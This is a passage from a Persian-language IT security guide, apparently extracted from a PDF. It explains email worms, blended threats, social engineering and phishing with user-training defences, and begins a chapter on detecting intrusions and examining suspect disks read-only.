ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺣﺎﻭﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﺎﺷﻨﺪ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﺪ )ﻣﺜﻞ ﻳﻚ ﻭﻳﺮﻭﺱ( .ﺻـﺪﻫﺎ ﻛـﺮﻡ ﺷـﺒﻜﻪﺍﻱ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ
ﻻ ﺁﺩﺭﺳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ .ﺷﺎﻳﺪ ﺑﺘﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺷﺎﻳﻌﺘﺮﻳﻦ ﻛﺮﻣﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﻧﺪ .ﺍﻳﻦ ﻛﺮﻣﻬﺎ ﻣﻌﻤﻮ ﹰ
ﭘﺴﺘﻲ ﺩﻳﮕﺮﺍﻥ ﺭﺍ ﺍﺯ ﺩﻓﺘﺮﭼﺔ ﺁﺩﺭﺳﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺁﻟﻮﺩﻩ ﺑﺪﺳﺖ ﻣﻲﺁﻭﺭﻧﺪ ﻭ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﭘﻴﺎﻡ ﻣﻬﻤﻲ ﺍﺯ ﻃﺮﻑ ﺻﺎﺣﺐ ﺳﻴﺴﺘﻢ ﺁﻟﻮﺩﻩ )ﻳﺎ ﺣﺘﻲ
ﺍﺯ ﻃﺮﻑ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻧﺎﻣﺸﺎﻥ ﺩﺭ ﺩﻓﺘﺮﭼﺔ ﺁﺩﺭﺳﻬﺎﻱ ﺻﺎﺣﺐ ﺳﻴﺴﺘﻢ ﺁﻟﻮﺩﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ( ﺑﻪ ﺁﻧﻬﺎ ﻣﻲﻓﺮﺳﺘﻨﺪ.
ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﻛﺮﻣﻬﺎ ﻣﺴﺘﻠﺰﻡ ﻫﻤﺎﻥ ﻓﻨﻮﻥ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻧﻔﻮﺫ ﺍﺳﺖ .ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﺎﺷﻴﻦ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ،ﻳﻚ ﻛﺮﻡ ﻫﻢ ﻣﻲﺗﻮﺍﻧـﺪ.
ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻳﻤﻦ ﺑﺎﺷﺪ ،ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﻛﺮﻣﻬﺎ ﻧﻴﺰ ﺍﻣﻨﻴﺖ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺗﻤﺎﻡ ﺗﻮﺻﻴﻪﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭ ﻣـﻮﺭﺩ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺭﺍﺋﻪ ﺷﺪ ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﻗﺎﺑﻞ ﺍﻋﻤﺎﻝ ﻫﺴﺘﻨﺪ.
ﺍﮔﺮ ﺗﺮﺩﻳﺪ ﺩﺍﺷﺘﻴﺪ ﻛﻪ ﺗﻮﺳﻂ ﻳﻚ ﻛﺮﻡ ﺷﺒﻜﻪﺍﻱ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ،ﺑﺎ ﻣﺮﺍﻛﺰ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ٣٢٩ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳـﺪ ﻭ
ﺑﺒﻴﻨﻴﺪ ﺁﻳﺎ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺰ ﮔﺰﺍﺭﺷﺎﺕ ﻣﺸﺎﺑﻬﻲ ﺩﺍﺩﻩﺍﻧﺪ ﻳﺎ ﺧﻴﺮ .ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺣﺎﺩﺛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﻃﺮﻳﻖ ﺍﻃﻼﻋﺎﺕ ﻣﻔﻴﺪﻱ ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ
ﻳﺎ ﺑﺎﺯﻳﺎﺑﻲ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ .ﺍﺗﺼﺎﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﻗﻄﻊ ﻛﻨﻴﺪ ﺗﺎ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺷﻤﺎ ﺍﻳﺰﻭﻟﻪ ﺷـﻮﺩ .ﺍﮔـﺮ ﻭﺍﻗﻌـﹰﺎ ﻛﺮﻣـﻲ ﺑـﻪ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺭﺧﻨﻪ ﻛﺮﺩﻩ ﺑﺎﺷﺪ ،ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﮔﺴﺘﺮﺵ ﺁﻥ ﻛﻤﻚ ﻛﺮﺩﻩﺍﻳﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺟﻠﻮﻱ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﻣﻬـﻢ ﺑـﻪ
ﺧﺎﺭﺝ ﺍﺯ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺧﻮﺩ ﺭﺍ ﮔﺮﻓﺘﻪﺍﻳﺪ .ﺍﮔﺮ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻭ ﺳﺎﻳﺮ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺨﻮﺑﻲ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ،ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺑـﻪ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﻭﺟﻬﻲ
ﺑﻴﺸﺘﺮ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱﺷﺪﺓ ﺟﺪﻳﺪ ﻭ ﺧﻄﺮﻧﺎﻛﺘﺮﻳﻦ ﺁﻧﻬﺎ "ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﻭﺟﻬﻲ" ﻫﺴﺘﻨﺪ .ﻳﻚ ﺗﻬﺪﻳﺪ ﭼﻨﺪﻭﺟﻬﻲ ،ﺣﻤﻠـﻪﺍﻱ ﺑﺮﻧﺎﻣـﻪﺍﻱ
ﺍﺳﺖ ﻛﻪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﭼﻨﺪ ﻧﻮﻉ ﻣﺨﺘﻠﻒ ﺣﻤﻠﻪ ﺭﺍ ﺗﺮﻛﻴﺐ ﻣﻲﻛﻨﺪ ﻭ ﺍﺯ ﻃﺮﻕ ﻣﺨﺘﻠﻔﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﺩ .ﻳﻚ ﺗﻬﺪﻳﺪ ﭼﻨﺪﻭﺟﻬﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﻳـﻚ
ﻛﺮﻡ ﺷﺒﻜﻪﺍﻱ ﺑﺎﺷﺪ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎ ﻓﺮﺳﺘﺎﺩﻥ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﺧﻮﺩﺵ ﺑﻪ ﺁﺩﺭﺳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺩﻓﺘﺮﭼﺔ ﺁﺩﺭﺳـﻬﺎﻱ ﺭﺍﻳﺎﻧـﺔ
ﺁﻟﻮﺩﻩ ،ﻭ ﻳﺎ ﺍﺯ ﻃﺮﻳﻖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺑﺎ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﺼﻞ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﺩ .ﭘﺲ ﺍﺯ ﺁﻟـﻮﺩﻥ ﺳﻴـﺴﺘﻢ ،ﻳـﻚ ﺩﺭﺏ ﻣﺨﻔـﻲ ﺑـﺮﺍﻱ ﻭﺭﻭﺩ
ﻣﺠﺪﺩ ﺑﻪ ﺁﻥ ،ﻳﻚ zombieﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻳﻚ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺩﺭ ﺁﻳﻨﺪﻩ ،ﻭ ﻧﻴﺰ ﻳﻚ ﺑﻤـﺐ ﻣﻨﻄﻘـﻲ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻳـﻚ
ﺗﺨﺮﻳﺐ ﺯﻣﺎﻧﺒﻨﺪﻱﺷﺪﻩ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ .ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑﺮ ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﻭﺟﻬﻲ ﻣﺸﺎﺑﻪ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑﺮ ﺗﻬﺪﻳﺪﺍﺕ ﺗﻚﻭﺟﻬﻲ ﺍﺳﺖ ،ﺑﺎ ﺍﻳـﻦ ﺗﻔـﺎﻭﺕ
ﻛﻪ ﺑﺎﻳﺪ ﺗﻤﺎﻡ ﺟﻬﺎﺕ ﺭﺍ ﺑﺎ ﻫﻢ ﺩﺭ ﻧﻈﺮ ﮔﺮﻓﺖ :ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﻓﺎﻋﻲ ﭼﻨﺪﻻﻳﻪ ﺍﺳﺖ.
ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﺧﻲ ﺍﺷﻜﺎﻻﺕ ﻭ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎ ،ﺩﺳﺘﺮﺳـﻴﻬﺎﻱ ﻳـﻚ
ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ ﺭﺍ ﺑﻪ ﺍﺑﺮﻛﺎﺭﺑﺮ ﻳﺎ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩ .ﺩﺭﻧﺘﻴﺠﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺯﺑﺪﻩ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﻤﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻧﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ
ﺭﻣﺰ ﻋﺒﻮﺭ ﻋﺎﺩﻱ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ ،ﻭ ﺳﭙﺲ ﻛﻨﺘﺮﻝ ﻛﺎﻣﻞ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﺪﺳﺖ ﺁﻭﺭﺩ.
ﻳﻜﻲ ﺍﺯ ﺭﺍﻳﺠﺘﺮﻳﻦ ﺭﺍﻫﻬﺎﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﻮﻥ "ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ" ﺍﺳﺖ .ﻣﻬﻨﺪﺳـﻲ ﺍﺟﺘﻤـﺎﻋﻲ
ﻳﻜﻲ ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﻭ ﻣﺆﺛﺮﺗﺮﻳﻦ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻛﺴﺐ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻲﺑﺎﺷﺪ .ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠـﺔ ﻣﻬﻨﺪﺳـﻲ
ﻻ ﻣﻬﺎﺟﻢ ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﻣﻘﺼﺪ ﺗﻠﻔﻦ ﻣﻲﺯﻧﺪ ﻭ ﺳﻌﻲ ﻣﻲﻛﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺑﺮﻗﺮﺍﺭﻱ ﺭﻭﺍﺑﻂ ﺍﺟﺘﻤﺎﻋﻲ ،ﺩﺭ ﻣﻮﺭﺩ ﺳﺎﺯﻣﺎﻥ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺟﺘﻤﺎﻋﻲ ،ﻣﻌﻤﻮ ﹰ
ﺑﺪﺳﺖ ﺁﻭﺭﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺗﻈﺎﻫﺮ ﻛﻨﺪ ﻛﻪ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺟﺪﻳﺪ ﺍﺳﺖ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻛﺮﺩﻩ ،ﻭ ﺑﺨﻮﺍﻫـﺪ ﻛـﻪ
ﺭﻣﺰ ﻋﺒﻮﺭﺵ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﺩ .ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻈﺎﻫﺮ ﻛﻨﺪ ﻛﻪ ﻧﻤﺎﻳﻨﺪﺓ ﻳﻚ ﺳﺮﻭﻳﺲ ﺧﺪﻣﺎﺗﻲ ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻧﻴـﺎﺯ ﺩﺍﺭﺩ ﻛـﻪ ﺭﻣـﺰ
ﻻ ﻣﺆﺛﺮ ﻭﺍﻗﻊ ﻣـﻲﺷـﻮﻧﺪ ،ﭼـﻮﻥ ﻋﻤـﻮﻡ ﻣـﺮﺩﻡ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﺩﺭ ﺣـﻞ ﻋﺒﻮﺭ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ .ﺣﻤﻼﺕ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﻣﻌﻤﻮ ﹰ
ﻱ ﺑﺎﺯﻳﻬﺎﻱ ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﻧﻔﺲ ﺩﺍﻧﺴﺖ.ﻝ ﺭﺍﻳﺎﻧﻪﺍ ﹺ
ﻣﺸﻜﻼﺕ ﺳﻬﻴﻢ ﺑﺎﺷﻨﺪ .ﺩﺭ ﻭﺍﻗﻊ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﺭ ﻣﺴﻴﺮ ﺍﻳﻦ ﺣﻤﻼﺕ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻣﻌﺎﺩ ﹺ
ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺍﻧﺠﺎﻡ ﺩﺍﺩ .ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﻪ ﺍﺻﻄﻼﺡ " "phishingﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﻳﻜﺠـﺎ ﺑـﻪ
ﻫﺰﺍﺭﺍﻥ ﻳﺎ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﻛﺎﺭﺑﺮ ،ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻜﻲ ﺍﺯ ﻓﻨﻮﻥ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﻣﻲﻓﺮﺳﺘﻨﺪ .ﺑﺮﺧـﻲ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺩﺭﺧﻮﺍﺳـﺖ
ﺩﺭﻳﺎﻓﺖ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻲﻛﻨﻨﺪ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧﻴﺰ ﺩﺭﺧﻮﺍﺳﺖ ﺷﻤﺎﺭﻩﻫﺎﻱ ﻣﻌﺘﺒﺮ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ.
ﻣﺆﺛﺮﺗﺮﻳﻦ ﺭﻭﺵ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﺗﻬﻴﺔ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺁﻣﻮﺯﺷﻲ ﻓﺸﺮﺩﻩ ﻭ ﺟﺪﻱ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺖ .ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺁﻣﻮﺯﺵ ﺩﺍﺩ
)ﻭ ﻣﺘﻨﺎﻭﺑﹰﺎ ﺑﻪ ﺁﻧﻬﺎ ﻳﺎﺩﺁﻭﺭﻱ ﻛﺮﺩ( ﻛﻪ ﻫﻴﭽﮕﺎﻩ ﺑﻪ ﻛﺴﻲ ﻛﻪ ﺍﻭ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻛﺎﺭﻣﻨﺪ ﻣﺠﺎﺯ ﺑﺨﺶ ﺍﻣﻨﻴﺘﻲ ﺳﺎﺯﻣﺎﻥ ﻧﻤـﻲﺷﻨﺎﺳـﻨﺪ ﺍﻃﻼﻋـﺎﺕ ﺍﻣﻨﻴﺘـﻲ
ﻧﺪﻫﻨﺪ ،ﻭ ﺣﺘﻲ ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﻫﻢ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺗﻨﻬﺎ ﺑﻪ ﺧﻮﺩ ﺷﺨﺺ ﺑﺪﻫﻨﺪ .ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﮔﻔﺘﻪ ﺷﻮﺩ ﻛﻪ ﻫﻴﭽﻴـﻚ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺍﻣﻨﻴﺘـﻲ
ﻫﻴﭽﮕﺎﻩ ﺍﺯ ﺁﻧﺎﻥ ﻧﺨﻮﺍﻫﺪ ﺧﻮﺍﺳﺖ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ،ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ،ﻳﺎ ﺳﺎﻳﺮ ﻋﻨﺎﺻﺮ ﻣﮑﻔﻲ ﺑﺮﺍﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺭﺍ ﻓـﺎﺵ ﺳـﺎﺯﻧﺪ؛ ﻭ
ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭﺻﻮﺭﺕ ﺩﺭﻳﺎﻓﺖ ﭼﻨﻴﻦ ﭘﻴﺎﻣﻬﺎﻳﻲ ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺭﺍ ﺳﺮﻳﻌﹰﺎ ﺑﻪ ﺍﻓﺮﺍﺩ ﻣﺴﺌﻮﻝ ﮔﺰﺍﺭﺵ ﺩﻫﻨﺪ.
٤٢٣ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﻧﻬﻢ
ﻛﺸﻒ ﻭ ﻣﺪﻳﺮﻳﺖ ﻧﻔﻮﺫ
ﻛﻠﻴﺎﺕ
ﻋﻠﻴﺮﻏﻢ ﺗﻼﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻮﺭﺩ ﺩﺳﺘﻜﺎﺭﻱ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺑﺤﺚ ﺩﺭ ﻣﻮﺭﺩ ﺗﺪﺍﺑﻴﺮﻱ ﭼـﻮﻥ ﺑـﺎﺯﺑﻴﻨﻲ،
ﺛﺒﺖ ﻭﻗﺎﻳﻊ ،ﻭ ﺍﻧﺠﺎﻡ ﺍﻗﺪﺍﻣﺎﺕ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺍﻱ ﻛﺸﻒ ﺩﺳﺘﻜﺎﺭﻳﻬﺎ ﻭ ﺗﺸﺨﻴﺺ ﺗﻐﻴﻴﺮﺍﺕ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻭ ﻣﺮﺣﻠﻪ ﺑﻪ ﻣﺮﺣﻠﻪ ﺭﺍﻩ ﺑﺪﺳﺖﮔﻴﺮﻱ ﻣﺠﺪﺩ
ﻛﻨﺘﺮﻝ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﺷﻤﺎ ﻧﺸﺎﻥ ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ.
ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺩﺍﺭﺍﻱ ﻓﻮﺍﻳﺪ ﻭ ﻣﻀﺮﺍﺗﻲ ﻫﺴﺘﻨﺪ .ﺩﺭ ﻫﺮ ﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺭﺍﻫﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﻪ ﺩﺳﺘﻜﺎﺭﻱ
ﺷﺪﻥ ﺁﻥ ﻣﻮﺭﺩ ﺗﺮﺩﻳﺪ ﺍﺳﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍ ﺑﻄﻮﺭ ﻓﻴﺰﻳﻜﻲ ﺍﺯ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﺎﺭﺝ ﻛﻨﻴﺪ ،ﺩﻳﺴﻚ ﺭﺍ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺩﻳـﺴﻚ ﻛﻤﻜـﻲ •
ﻭﺻﻞ ﻛﻨﻴﺪ ،ﺭﺍﻳﺎﻧﺔ ﺩﻭﻡ ﺭﺍ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻧﻤﺎﻳﻴﺪ ،ﺩﻳﺴﻚ ﺭﺍ ﺑﺼﻮﺭﺕ ﻓﻘﻂ ﺧﻮﺍﻧﺪﻧﻲ mountﻛﻨﻴﺪ ،ﻭ ﺳﭙﺲ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺭﺍﻳﺎﻧـﺔ ﺩﻭﻡ ﺭﺍ
ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺩﻳﺴﻚ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ )ﻳﺎ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻲ ،ﻋﻴﻨﹰﺎ ﻳﻚ ﻧﺴﺨﺔ ﺩﻭﻡ ﺍﺯ ﺭﻭﻱ ﺩﻳﺴﻚ ﺗﻬﻴﻪ ﻛﻨﻴﺪ(.
ﺩﻳﺴﻚ ﻣﺸﻜﻮﻙ ﺭﺍ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﻣﺸﻜﻮﻙ ﺑﺎﻗﻲ ﺑﮕﺬﺍﺭﻳﺪ ،ﺍﻣﺎ ﺭﺍﻳﺎﻧﺔ ﻣﺸﻜﻮﻙ ﺭﺍ ﺑﺎ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﻄﻤـﺌﻦ ﺍﺯ ﺩﻳـﺴﻚ ﻓـﺸﺮﺩﻩ ﻳـﺎ •
ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ .ﺳﭙﺲ ﺗﻨﻬﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺭﻭﻱ ﺩﻳﺴﻚ ﻓـﺸﺮﺩﻩ ﻳـﺎ ﺩﻳـﺴﻚ ﻓﻼﭘـﻲ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﻳـﺴﻚ
ﻻ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﺓ ﺁﻧﺮﺍ ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﻧﻤﺎﻳﻴﺪ. ﻣﺸﻜﻮﻙ ﺭﺍ ﺑﺼﻮﺭﺕ ﻓﻘﻂﺧﻮﺍﻧﺪﻧﻲ mountﻛﻨﻴﺪ ﻭ ﺳﻴﺴﺘ ﹺﻢ ﻓﺎﻳ ﹺ
ﻞ ﺍﺣﺘﻤﺎ ﹰ
ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﻣﺸﻜﻮﻙ ﻭﺍﺭﺩ ﺷﻮﻳﺪ ﻭ ﻫﺮ ﺍﺑﺰﺍﺭ ﺑﺮﺭﺳﻲ ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺘﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻧﺼﺐ ﺑﻮﺩ ﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻭﺭﻳﺪ. •
330 Metadata
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٢٤
